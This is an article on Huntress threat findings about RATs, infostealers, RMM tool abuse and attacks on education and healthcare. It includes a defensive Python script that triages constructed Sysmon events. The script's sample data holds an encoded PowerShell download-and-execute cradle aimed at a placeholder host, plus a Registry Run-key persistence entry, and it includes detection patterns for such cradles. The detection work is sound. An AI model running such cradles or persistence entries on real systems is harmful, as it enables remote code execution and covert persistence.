Ransomware remains a constant threat to enterprises, yet it accounts for only about 9.5% of observed threats. Other categories are larger: remote access trojans (13%), other malware (17%), malicious scripts (22%), and infostealers (24%). RATs are also involved in more than 75% of remote access cases. Huntress observed growing abuse of remote monitoring and management (RMM) tools such as ConnectWise ScreenConnect, LogMeIn, and TeamViewer to gain access, move laterally, and maintain persistence. Phishing has also become more sophisticated and remains a favored method of initial access, supported by malicious infrastructure that lets threat actors run attacks with little effort.
Regardless of the attack method, education is the most targeted sector, accounting for 21% of incidents, followed by healthcare at 17%. The Huntress researchers noted that healthcare is particularly exposed to script-based attacks and to exploitation of vulnerabilities in legacy systems. Most of the malicious scripts Huntress detected and blocked appear to be associated with infostealers such as Gootloader, with PowerShell components abused for obfuscation and anti-analysis. The scripts frequently query the Windows Registry to gather information for exfiltration and to establish persistence; the next stage of the attack usually installs additional malware payloads such as RATs.
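The three behaviours described above (RMM agents running where they are not expected, obfuscated PowerShell, and Registry Run-key persistence) map directly onto Sysmon telemetry: process creation (Event ID 1) and registry value set (Event ID 13). The script below is an added example written for this article, not Huntress's code or detection logic. The sample events, the host names, the SID, the `example.invalid` URL and the set of "approved" RMM hosts are all constructed assumptions, and the list of RMM binary names is deliberately partial; a real deployment would take the events from a SIEM query and the allow-list from asset inventory.

```python
"""Triage of constructed Sysmon-style events for three behaviours: RMM tools
launched on hosts where no RMM agent is expected, PowerShell run with an
encoded command, and writes to Registry Run/RunOnce keys.
Added example; every event below is constructed, not real telemetry."""
import base64
import re

# ASSUMPTION: partial list of RMM client binaries; extend from your own inventory.
RMM_BINARIES = {
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
    "logmein.exe", "teamviewer.exe", "teamviewer_service.exe",
}
# ASSUMPTION: hosts where an RMM agent is legitimately deployed (constructed name).
RMM_APPROVED_HOSTS = {"helpdesk-01"}

# Run/RunOnce autostart keys under HKLM or a user hive (Sysmon logs HKU\<SID>\...).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# Common download-cradle / decode primitives seen after decoding -EncodedCommand.
CRADLE_RE = re.compile(r"downloadstring|invoke-expression|\biex\b|frombase64string", re.I)

# Constructed sample events (hypothetical hosts, SID and URL).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode()
EVENTS = [
    {"id": 1, "host": "ws-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 13, "host": "ws-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"wscript.exe C:\Users\Public\update.js"},
    {"id": 1, "host": "ws-02",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe"},
    {"id": 1, "host": "helpdesk-01", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"id": 1, "host": "ws-03", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def decode_encoded_powershell(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None.
    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
    plus the special short form -ec; the payload is base64 of UTF-16LE text."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] not in "-/":
            continue
        name = flag[1:].lower()
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not valid base64/UTF-16LE
    return None


def triage(event):
    """Return a list of finding tags for one event (empty if nothing suspicious)."""
    findings = []
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if event["id"] == 1:
        if image_name in RMM_BINARIES and event["host"] not in RMM_APPROVED_HOSTS:
            findings.append(f"rmm_unexpected:{image_name}")
        decoded = decode_encoded_powershell(event.get("cmdline", ""))
        if decoded is not None:
            findings.append("powershell_encoded")
            if CRADLE_RE.search(decoded):
                findings.append("powershell_download_cradle")
    elif event["id"] == 13 and RUN_KEY_RE.search(event.get("target", "")):
        findings.append("runkey_persistence")
    return findings


def triage_all(events):
    """Map event index -> findings for every event that produced at least one."""
    results = {}
    for i, event in enumerate(events):
        findings = triage(event)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for i, findings in triage_all(EVENTS).items():
        e = EVENTS[i]
        print(f"[{e['host']}] event {e['id']}: {', '.join(findings)}")
```

The encoded-command check decodes the payload rather than just flagging the `-enc` flag, so the download cradle inside it can be matched; the RMM check is an allow-list by host, which is the only signal that separates a legitimate helpdesk agent from the same binary dropped by an attacker. Any legitimate software installer that writes its own Run key will trigger the third rule, so in practice that one is a triage lead rather than an alert on its own.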
Huntress noted a trend across all industries in which threat actors forgo file encryption in favor of data theft and extortion. Ransomware groups that target healthcare organizations have likewise gradually moved away from encryption, adopting a fast, high-volume business model. The researchers also observed a narrowing gap between the sophistication of attacks on large enterprises and attacks on SMEs: attack techniques against businesses of every size have become more effective.
Looking ahead, several trends are gaining momentum: ransomware groups will likely refine their extortion techniques, and others will shift to models that prioritize data theft over file encryption, while abuse of LOLBins, credential stealers, and RATs deployed to retain control will remain attackers' weapons of choice. The growing sophistication of phishing, including QR codes, image-based content, and brand impersonation, means that greater caution and HIPAA security awareness training are increasingly important.